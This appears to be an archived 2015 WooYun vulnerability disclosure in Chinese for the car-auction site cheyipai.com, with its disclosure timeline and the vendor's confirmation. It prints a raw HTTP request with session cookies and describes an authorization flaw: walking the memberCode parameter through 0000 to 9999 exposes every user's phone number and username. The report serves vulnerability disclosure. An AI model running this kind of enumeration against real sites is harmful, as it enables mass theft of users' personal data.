乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-04: 细节已通知厂商并且等待厂商处理中 2015-10-08: 厂商已经确认,细节仅向厂商公开 2015-10-18: 细节向核心白帽子及相关领域专家公开 2015-10-28: 细节向普通白帽子公开 2015-11-07: 细节向实习白帽子公开 2015-11-22: 细节向公众公开
RT
GET /usermain/GetUserInfo?CurrentSessionId=655376a9-1d4a-4322-a5f7-ae160d0a146b&optStatusCode=D7E3F8AB-1D93-4047-8A13-777164D99A0C&memberCode=US001691&_=1443932473804 HTTP/1.1Host: www.cheyipai.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestReferer: http://www.cheyipai.com/user/indexCookie: Hm_lvt_11a0d0462736ffe428c2decbb869ef07=1443931424; Hm_lpvt_11a0d0462736ffe428c2decbb869ef07=1443932398; Hm_lvt_c8752f1ed50be0798e275b8114081c89=1443931424; Hm_lpvt_c8752f1ed50be0798e275b8114081c89=1443932398; _adksh=1443931425481; _adkse=1802636bb006633554ef745b4fe8d1ab; _adksd=direct; _adksb=1443934199521; _adksc=1443931425481; _adksf=%26_u%3D0%26_a%3D0%26_k%3D0%26_s%3D0; _adksa=130025103.218070697.1443931425497.1443931425497.1443931425497; LoginValidCode=DJ5D; OW_RememberMe=per1sh; sid=655376a9-1d4a-4322-a5f7-ae160d0a146b; logininfo=pGM72YxKGoFFwiBYCN3rwMrgKfHC69mEk4Okz7k/qPJ+NZKnsytNkDA/8LBtYQu1yK95tp1t2zlAlrxxRNSKLgWuUh5+xC5FCon+TtkOD29RaNAZC1uKeVr/nZC2gHt6HSzq5ESMib58tK+suAHKSc/qM//+zOjqdFz8QuRGkwSSge9W4xFttwB0WOqNofYRM9r7SOIkZZp0r/cUHqwKbwuO3xaU8BZ6b1eitRvPwKjMIajvyD8/hXXepjSRuphA1r7gAoqWVj+vt2+O4JkSfGJ3F2aaLOIZKNS1Mmfu4YOOjsPfszEj1CO2EujD2d7aWE6eTOL6Q431oYGEfHF7M0ehfgVe+qif6VWt7agpQzRq/hk7Ym/Z0gwe+CTtB/qsDm3oNzESswian5n+hHlHJRfalsEljMPjKX9jJKrZ5ZN3xHqCBga1ANKjXp0xMFnzPg2o4xp8gIGs+HCZv8r2EKt2goeXpV8jT2SAZZV1KYfOb5DU20hjnyjFwFhQqF0bEU8bH57IolKbQIm61zTTDPPmmy6ozRsa64znYID64qAKeElx/mgbVpEX//JSOm8smlYechRxfDUb/qYUC3tg0dmyG6KHjg9IS1Bbi5CXct0rfIL7m4ECMQ==; loginSessionID=655376a9-1d4a-4322-a5f7-ae160d0a146bX-Forwarded-For: 8.8.8.8Connection: close
用户信息memberCode参数没进行权限控制可进行平行越权查看他人手机号与用户名
只要我们对memberCode参数后四位数字从0000到9999全跑一遍,就可把全站用户手机号导出来
越权控制好
危害等级:高
漏洞Rank:15
确认时间:2015-10-08 15:09
感谢提交
暂无